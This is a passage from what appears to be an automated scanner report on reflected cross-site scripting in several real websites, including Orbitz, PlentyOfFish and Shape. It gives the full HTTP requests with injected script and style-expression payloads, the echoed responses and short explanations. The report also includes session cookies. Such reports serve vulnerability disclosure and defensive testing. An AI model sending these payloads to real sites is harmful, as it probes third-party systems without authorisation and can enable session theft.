dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: OSC=E35A05AFA43F7428074770D0017AA45F; Path=/ Cache-Control: private Pragma: no-cache Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/ P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV" Content-Type: text/html Date: Wed, 02 Feb 2011 16:11:58 GMT Content-Length: 184528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t ...[SNIP]... <Meta Name="DCSext.ndid" CONTENT="aeromexico-winter-fares\954c0"style="x:expression(alert(1))"4d82bd8d62a,NC"/> ...[SNIP]...
The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 505c6"style%3d"x%3aexpression(alert(1))"6c0248732b6 was submitted in the cnt parameter. This input was echoed as 505c6"style="x:expression(alert(1))"6c0248732b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO505c6"style%3d"x%3aexpression(alert(1))"6c0248732b6&type=oa_qs HTTP/1.1 Host: www.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: OSC=D880EA6E561408E7CB3D9A862553C227; Path=/ Cache-Control: private Pragma: no-cache Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/ P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV" Content-Type: text/html Date: Wed, 02 Feb 2011 16:10:26 GMT Content-Length: 186935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w ...[SNIP]... <Meta Name="DCSext.ndtab" CONTENT="PRO505c6"style="x:expression(alert(1))"6c0248732b6"/> ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 929f5"style%3d"x%3aexpression(alert(1))"10bcaca89b2 was submitted in the type parameter. This input was echoed as 929f5"style="x:expression(alert(1))"10bcaca89b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs929f5"style%3d"x%3aexpression(alert(1))"10bcaca89b2 HTTP/1.1 Host: www.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: OSC=84F195AE3CDB76F652543ADC1AC7645F; Path=/ Cache-Control: private Pragma: no-cache Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/ P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV" Content-Type: text/html Date: Wed, 02 Feb 2011 16:11:33 GMT Content-Length: 186870
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w ...[SNIP]... <Meta Name="DCSext.ndid" CONTENT="promotions,oa_qs929f5"style="x:expression(alert(1))"10bcaca89b2"/> ...[SNIP]...
1.467. http://www.plentyoffish.com/meetme.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.plentyoffish.com
Path: /meetme.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b41c1"><script>alert(1)</script>b9320b26f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /meetme.aspx?b41c1"><script>alert(1)</script>b9320b26f68=1 HTTP/1.1 Host: www.plentyoffish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 01 Feb 2011 01:30:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4357
<html><head><title>Find Singles with Plentyoffish FREE Online Dating Personals Service</title>
1.468. http://www.plentyoffish.com/needs_test.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.plentyoffish.com
Path: /needs_test.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71843"><script>alert(1)</script>d3bff3c6b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /needs_test.aspx?71843"><script>alert(1)</script>d3bff3c6b0f=1 HTTP/1.1 Host: www.plentyoffish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 01 Feb 2011 01:30:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6131
<META name="description" content="A Free Relationship test that measures your needs in a relationship."> <meta name="KEYW ...[SNIP]... <form action="?SID=enhftrh2rwh40ylxbcdqkhlw&71843"><script>alert(1)</script>d3bff3c6b0f=1" method="post" name="frmLogin" > ...[SNIP]...
1.469. http://www.plentyoffish.com/poftest.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.plentyoffish.com
Path: /poftest.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3702a"><script>alert(1)</script>f50ea53eb4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /poftest.aspx?3702a"><script>alert(1)</script>f50ea53eb4b=1 HTTP/1.1 Host: www.plentyoffish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 01 Feb 2011 01:30:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10025
<META name="description" content="A Free Personality test that measures relationship compatibility for singles."> ...[SNIP]... <form action="?SID=enhftrh2rwh40ylxbcdqkhlw&3702a"><script>alert(1)</script>f50ea53eb4b=1" method="post" name="frmLogin" > ...[SNIP]...
1.470. http://www.plentyoffish.com/seriousintro.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.plentyoffish.com
Path: /seriousintro.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f319"><script>alert(1)</script>df4edccc94a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /seriousintro.aspx?8f319"><script>alert(1)</script>df4edccc94a=1 HTTP/1.1 Host: www.plentyoffish.com Proxy-Connection: keep-alive Referer: http://www.plentyoffish.com/register.aspx Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738426:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; __utmc=9489908; __utmb=9489908.4.10.1296523584
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 01 Feb 2011 01:30:03 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Content-Length: 10076
<html><title>Plentyoffish.com - Changing The Online Dating Industry</title>
<html><head><title>Plentyoffish.com 100% Free Online Dating Service for singles</title> <META HTTP-EQUIV="Conten ...[SNIP]... <form action="?SID=enhftrh2rwh40ylxbcdqkhlw&8f319"><script>alert(1)</script>df4edccc94a=1" method="post" name="frmLogin" > ...[SNIP]...
1.471. http://www.ratestogo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ratestogo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed69'-alert(1)-'57cc6386674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4ed69'-alert(1)-'57cc6386674=1 HTTP/1.1 Host: www.ratestogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 16:18:54 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DEVa TAIa OUR BUS UNI" X-Powered-By: ASP.NET pragma: no-cache cache-control: private Content-Length: 36741 Content-Type: text/html; Charset=windows-1252 Expires: Tue, 01 Feb 2011 16:18:52 GMT Set-Cookie: %7CSearchEng%7C=%7C%7C%7C%7C2011%2D2%2D4%7C2011%2D2%2D5%7C; path=/ Set-Cookie: ASPSESSIONIDCCCQTTTR=MOHDHHOALHAINFEGIBOFLLGC; path=/ Cache-control: no-cache
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12dbe'-alert(1)-'e5f670c0dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/xss12dbe'-alert(1)-'e5f670c0dc0/ HTTP/1.1 Host: www.scmagazineus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35894 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=tqppn045jb4esavsbkl3isfg; path=/; HttpOnly From: Web2-VM Date: Thu, 03 Feb 2011 04:05:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f75c<script>alert(1)</script>f7919591e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts7f75c<script>alert(1)</script>f7919591e3/articles/blood_sugar.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:34:59 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570899" Last-Modified: Tue, 01 Feb 2011 14:34:59 +0000 X-Powered-By: PHP/5.2.13 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107113 (MII-APC/1.6) Connection: close Content-Length: 27263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts7f75c<script>alert(1)</script>f7919591e3/articles/blood-sugar.html </div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99e23<script>alert(1)</script>d36e3d1a30d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articles99e23<script>alert(1)</script>d36e3d1a30d/blood_sugar.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:18 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570918" Last-Modified: Tue, 01 Feb 2011 14:35:18 +0000 X-Powered-By: PHP/5.2.9 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107113 (MII-APC/1.6) Connection: close Content-Length: 27265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articles99e23<script>alert(1)</script>d36e3d1a30d/blood-sugar.html </div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a635<script>alert(1)</script>5dadd1e4bd0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articles/blood_sugar.html1a635<script>alert(1)</script>5dadd1e4bd0 HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:45 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570945" Last-Modified: Tue, 01 Feb 2011 14:35:45 +0000 X-Powered-By: PHP/5.2.9 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107109 (MII-APC/1.6) Connection: close Content-Length: 27265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articles/blood-sugar.html1a635<script>alert(1)</script>5dadd1e4bd0 </div> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d774<script>alert(1)</script>9b61c9a28ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts6d774<script>alert(1)</script>9b61c9a28ac/articles/workout_schedule.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:12 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570912" Last-Modified: Tue, 01 Feb 2011 14:35:12 +0000 X-Powered-By: PHP/5.2.9 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107113 (MII-APC/1.6) Connection: close Content-Length: 27275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts6d774<script>alert(1)</script>9b61c9a28ac/articles/workout-schedule.html </div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb792<script>alert(1)</script>6f82f8506a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articlescb792<script>alert(1)</script>6f82f8506a9/workout_schedule.html HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:27 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570927" Last-Modified: Tue, 01 Feb 2011 14:35:27 +0000 X-Powered-By: PHP/5.2.13 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107102 (MII-APC/1.6) Connection: close Content-Length: 27275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articlescb792<script>alert(1)</script>6f82f8506a9/workout-schedule.html </div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c01ef<script>alert(1)</script>abad6a1bc51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /workouts/articles/workout_schedule.htmlc01ef<script>alert(1)</script>abad6a1bc51 HTTP/1.1 Host: www.shape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 14:35:44 GMT Server: Apache Vary: Accept-Encoding Cache-Control: max-age=900 Expires: X-Server-Name: (null) ETag: "1296570944" Last-Modified: Tue, 01 Feb 2011 14:35:44 +0000 X-Powered-By: PHP/5.2.13 Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Content-Type: text/html; charset=utf-8 Via: 1.1 mdw107109 (MII-APC/1.6) Connection: close Content-Length: 27275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com" ...[SNIP]... <br /> workouts/articles/workout-schedule.htmlc01ef<script>alert(1)</script>abad6a1bc51 </div> ...[SNIP]...
The value of the account request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21416"><script>alert(1)</script>426ca979e1e was submitted in the account parameter. This input was echoed as 21416\"><script>alert(1)</script>426ca979e1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=&last_name=&email=&account=21416"><script>alert(1)</script>426ca979e1e HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d89"><script>alert(1)</script>4742146ad85 was submitted in the email parameter. This input was echoed as 61d89\"><script>alert(1)</script>4742146ad85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=&last_name=&email=61d89"><script>alert(1)</script>4742146ad85&account= HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
